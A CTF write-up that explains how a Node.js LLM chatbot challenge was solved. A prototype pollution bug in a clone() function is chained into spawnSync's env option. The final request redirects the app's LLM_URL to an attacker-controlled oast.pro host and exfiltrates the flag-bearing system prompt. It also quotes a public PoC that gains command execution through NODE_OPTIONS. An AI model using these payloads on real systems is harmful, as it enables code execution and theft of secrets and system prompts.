HackPack CTF 2024 LLM Edition - ask-me-anything

ask-me-a-question

This challenge was a 450-point web challenge of the HackPack 2024 CTF. The focus of this CTF was on exploiting LLM applications. However, this app could fit into most CTF formats, as the exploit itself is not really related to LLMs.

In my personal opinion the challenge is well done. The vulnerability is anchored in a real-world scenario with plenty of research backing it up. The final payload is quite close to publicly available, copy-pastable payloads. However, the CTF player still needs to understand the vulnerability at its core and make minor adjustments to get it to work.

Vulnerability Overview

The basics

The challenge environment consists of two parts: a Python FastAPI webserver and a node.js server, which is what we will focus on.

The web interface of the challenge provides very limited functionality. There is only one endpoint, /ask, which allows us to send prompts to the application.

A typical prompt looks like the following:

Request

POST /ask HTTP/1.1
Host: localhost:1338
Content-Length: 51
Api-UserAgent: frontend/0.1alpha
sec-ch-ua: "Chromium";v="123", "Not:A-Brand";v="8"
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:1338
Referer: http://localhost:1338/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

{"prompt":{"role":"user","content":"What is HTML"}}

Response

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 13 Apr 2024 14:01:09 GMT
Content-Length: 1230

{"status":200,"message":"?\nAI: HTML is a markup language used to create content for the web. It stands for HyperText Markup Language.\nHuman: <snipped> each of these elements on the page.\nHuman: Wow, I had no idea! Can you teach me more about"}

The sink

Our goal is to get the flag. The flag hides within the defaultPrompt const, which retrieves it from an environment variable. In order to get the flag we need one of the following:

  1. Access to the prompts as they are sent to the LLM server (the app always sends all prompts to the server, but filters out the flag prompt)
  2. An LLM answer which reflects the system prompt (which contains the flag), or reflects the flag in its answer
  3. The ability to retrieve the flag from the node.js environment

const defaultPrompt = [
  {"role": "system", "content": `Blah Blah Blah '${process.env['FLAG']}'. Blah Blah Blah. You are a chatbot named Aanya.`},
  {"role": "user", "content": "Introduce yourself"},
  {"role": "assistant", "content":"I'm Aanya, and I am a online chatbot."},
];

The most promising sink is in the llm.js file, which sends all prompts to a URL retrieved from an environment variable of the process.

const LLM_URL = process.env['LLM_URL']
const resp = await fetch(LLM_URL, {
    method: 'POST',
    body: JSON.stringify({
        'messages': prompts
    }),
    headers: {
        "Content-Type": "application/json",
    }
});

It must be noted that the llm.js file is executed by the node.js app server. As can be seen in the following code snippet, the server spawns a synchronous process (with spawnSync) with a command line along the lines of: node ./llm.js system "system prompt with <flag>" user "the other prompts" ...


function createArguments(fullPrompt) {
  let list = ['./llm.js', ];
  for(let i = 0; fullPrompt[i]; i++) {
    list.push(fullPrompt[i].role);
    list.push(fullPrompt[i].content);
  }
  return list;
}

const child =  spawnSync('node', createArguments(allPrompt), { encoding: 'utf-8', stdio: 'pipe' });
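
To make the resulting command line concrete, here is a small sketch (assuming the defaultPrompt and createArguments definitions above, with the flag replaced by a placeholder and the clone() step ignored) of the argument list; role and content simply alternate:

// Sketch: what createArguments() produces for the prompts above plus our user prompt.
console.log(createArguments([...defaultPrompt, { role: 'user', content: 'What is HTML' }]));
// -> [ './llm.js',
//      'system', "Blah Blah Blah '<FLAG>'. Blah Blah Blah. You are a chatbot named Aanya.",
//      'user', 'Introduce yourself',
//      'assistant', "I'm Aanya, and I am a online chatbot.",
//      'user', 'What is HTML' ]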

Exploitation

We are very limited in what we can submit to the challenge. There are multiple “prompt injection” sanitization routines. The following code snippet highlights one of them. As can be seen, our prompt object must carry the attribute role: user and has to pass some additional input validation.


function checkPromptInjection(prompt) {
  if ( typeof prompt !== 'object' ) {
    throw Error('Incorrect format specified');
  }

  if ( prompt.role !== 'user' ) {
    throw Error('Incorrect user specified');
  }

  if ( !/^[a-zA-Z0-9 ]+$/.test(prompt.content) ) {
    throw Error('Prompt injection detected');
  }

  if ( prompt.content.length > 40 ) {
    throw Error('Prompt is greater than 40 characters.')
  }

  if ( !allowedPrompts.includes(prompt.content) ) {
    throw Error('Prompt injection detected')
  }

  const safePromptData = clone({}, prompt, 5);
  return safePromptData;
}
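
It is worth noting that none of these checks inspect properties other than role and content, so any additional keys on the submitted object are passed along untouched into the clone() call at the end of the function. A small sketch, meant to run standalone next to copies of checkPromptInjection and the clone function it calls (shown further below); the allowlist entry is a guess, since allowedPrompts is not shown in this writeup:

// Sketch: assumes the checkPromptInjection and clone definitions from this writeup,
// plus a hypothetical allowlist entry for "What is HTML".
const allowedPrompts = ['What is HTML'];
const prompt = JSON.parse('{"role":"user","content":"What is HTML","extra":"ignored by every check"}');
console.log(checkPromptInjection(prompt)); // no error; "extra" is cloned along with role and content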

The previous sanitization routine also contains a potential indicator of a JavaScript prototype pollution vulnerability, namely the following line:

const safePromptData = clone({}, prompt, 5);

If we investigate the clone function, we find that

  1. it was created by a developer using an LLM prompt
  2. the function recursively clones a JavaScript object

As this clone function is called on an attacker-controlled prompt object, we are able to manipulate the prototype of the app server and inject attacker-controlled properties into its environment.

Prototype pollution vulnerabilities typically arise when a JavaScript function recursively merges an object containing user-controllable properties into an existing object. (https://portswigger.net/web-security/prototype-pollution)

/*
  Prompt: 
  Generate a JS Function that clones a javascript object, 
  make sure to handle nested objects and nested array properly.
  Output (starts here):
  This function 'clone' creates a deep copy of a given object.
  It recursively iterates through the properties of the object,
  copying each property into a new object. If a property is an object itself,
  it recursively clones that object. If a property is an array, it creates
  a shallow copy of the array. Finally, it returns the cloned object.
*/
function clone(target, obj, depth) {
  
  if ( depth === 0 ) {
    return {};
  }

  // Iterate through each key in the original object
  for (const key in obj) {
    // Convert string key to integer if it's numeric
    const numericKey = /^\d+$/.test(key) ? parseInt(key) : key;
    // Check if the value associated with the key is an object
    if (typeof obj[numericKey] === 'object') {
      if ( !target[numericKey] ) {
        target[numericKey] = {};
      }
      // If the value is an object, recursively clone it
      target[numericKey] = clone(target[numericKey], obj[numericKey], depth - 1);
    } else if (Array.isArray(obj[numericKey])) {
      // If the value is an array, create a copy of the array
      target[numericKey] = obj[numericKey].slice();
    } else {
      // Otherwise, directly assign the value to the cloned object
      target[numericKey] = obj[numericKey];
    }
  }
  
  // Return the cloned object
  return target;
}
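
The following minimal sketch, assuming only the clone function above, shows why this is dangerous: JSON.parse creates an own, enumerable property literally named "__proto__", the for...in loop enumerates it, and clone then recurses into target["__proto__"], which is Object.prototype, copying our payload onto it:

// Minimal sketch of the pollution gadget (assumes the clone function above).
const payload = JSON.parse('{"role":"user","content":"What is HTML","__proto__":{"ppp":"polluted"}}');
clone({}, payload, 5);
console.log({}.ppp); // -> "polluted": every object now inherits the property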

In practice, injecting a property called evilProperty is unlikely to have any effect. However, an attacker can use the same technique to pollute the prototype with properties that are used by the application, or any imported libraries. (https://portswigger.net/web-security/prototype-pollution)

First we test our thesis that prototype pollution is possible. We inject a quick-and-dirty console.log(ppp) into the app server. The property ppp does not exist yet, so we get an error:

const safePrompt = checkPromptInjection(prompt);
console.log("000:"+ ppp +"000end");
let allPrompt = [];

[Screenshot: ReferenceError because ppp is not defined]

Then we inject the property through prototype pollution and check whether everything works as expected. As we can see, we successfully injected the property ppp into the prototype (__proto__) of the node.js app.
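
The request used for this test is essentially the final payload shown later, just without the env and LLM_URL properties; roughly:

{"prompt":{"role":"user","content":"What is HTML","__proto__":{"ppp":"testppp"}}}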

[Screenshot: console.log output showing the injected ppp property]

To exploit the prototype pollution we need to find a property which we can manipulate, which is not overwritten by the application, and whose manipulation has a security-relevant side effect.

A popular prototype pollution sink is a call to spawnSync. The child_process library reads certain options which, when not specifically set by the developer, become controllable by the attacker.

// Prototype pollution due to the `clone` function
const safePrompt = checkPromptInjection(prompt);

let allPrompt = [];
for(let i = 0; i < defaultPrompt.length; i++) {
    // Prototype pollution due to the `clone` function
    allPrompt.push(clone({}, defaultPrompt[i], 5));
}
// pushing the following arguments onto a list: `llm.js` `system prompt` `assistant prompt` `user prompt`
allPrompt.push(safePrompt);
// Spawning the `llm.js` script with the command
// `node "llm.js" "system prompt" "assistant prompt"` ...
const child =  spawnSync('node', createArguments(allPrompt), { encoding: 'utf-8', stdio: 'pipe' });

The following public PoC makes use of several properties which an attacker can control. While this PoC is a good indication of how to exploit our CTF challenge, it does not run out of the box.

p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawnSync('something');

We can try to inject some of the properties from the PoC and observe different error messages (please note that we inserted some custom console.log statements to surface the errors).

  1. If we inject a "shell":"/proc/self/exe" property, we get an error because the shell tries to execute llm.js directly, without the node command.

[Screenshot: error output after injecting the shell property]

  2. If we inject a non-existent shell, we can see how the process is spawned. Please note that the prompt containing the “flag” is passed as an argument.

[Screenshot: spawn arguments, including the system prompt with the flag]

The PoC available on HackTricks expects the victim to call spawnSync with just a command and no further arguments or options. Therefore we need to adjust the PoC.

Within the llm.js file we notice that the fetch call uses the variable LLM_URL to determine where to send our prompts. Normally LLM_URL points to the challenge's Python server, which hosts the LangChain HuggingFace API.

However, if we have a look at the top of the file, we notice that the script retrieves LLM_URL from the process environment.

// llm.js
const LLM_URL = process.env['LLM_URL']
const prompts = [];
[...]
const resp = await fetch(LLM_URL, {
    method: 'POST',
    body: JSON.stringify({
        'messages': prompts
    }),
    headers: {
        "Content-Type": "application/json",
    }
});

Knowing that LLM_URL is controlled by the process environment is great news. If we check the previous HackTricks PoC, we notice that it also utilises the env property to exploit spawnSync.

p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}

If we have a look at the spawnSync call, we can also see that the developer does not pass an explicit env option to the process. Let's attempt to overwrite the env of the llm.js process and control LLM_URL.

For a successful exploit we first pollute the env property with an empty object. Since the developer passes no explicit env option, spawnSync now builds the child environment from this attacker-controlled object instead of the real process.env. Afterwards we pollute the LLM_URL property with an attacker-controlled URL.

When the process is spawned, spawnSync enumerates the (empty) env object with a for...in loop, which also picks up properties inherited from the polluted Object.prototype. The child environment therefore no longer contains the original LLM_URL pointing to the Python server, but our polluted one instead. When llm.js reads LLM_URL from its environment, it gets our attacker-controlled URL.

As a result, the fetch call in llm.js sends all prompts, including the system prompt with the flag, to our attacker-controlled interactsh server.
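
The gadget can be reproduced in isolation. The following standalone sketch (independent of the challenge code; attacker.example is a placeholder) pollutes env and LLM_URL and shows the variable turning up in a child process that is spawned without an explicit env option, at least on current node versions:

// Standalone sketch of the env gadget: spawnSync falls back to the polluted
// (empty) env object and, while building the child environment, also picks up
// properties inherited from Object.prototype, including our LLM_URL.
const { spawnSync } = require('child_process');

Object.prototype.env = {};
Object.prototype.LLM_URL = 'http://attacker.example/';

const child = spawnSync(process.execPath,
  ['-e', 'console.log(process.env.LLM_URL)'],
  { encoding: 'utf-8' });
console.log(child.stdout); // -> http://attacker.example/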

POST /ask HTTP/1.1
Host: localhost:1338
Content-Length: 159
Api-UserAgent: frontend/0.1alpha
sec-ch-ua: "Chromium";v="123", "Not:A-Brand";v="8"
Content-Type: application/json
Connection: close

{"prompt":{"role":"user","content":"What is HTML",
"__proto__":{"ppp":"testppp","env":{},
"LLM_URL":"http://codpf2tu49utntqv3a6g4noqs6o3y6ijf.oast.pro/"}
}}

[Screenshot: request received by the interactsh server, containing the system prompt with the flag]

The request body received by our interactsh server contains the flag, and we successfully solved the CTF. Sadly, as you might have noticed from the timestamp, we solved the challenge 6 minutes too late and did not receive any points…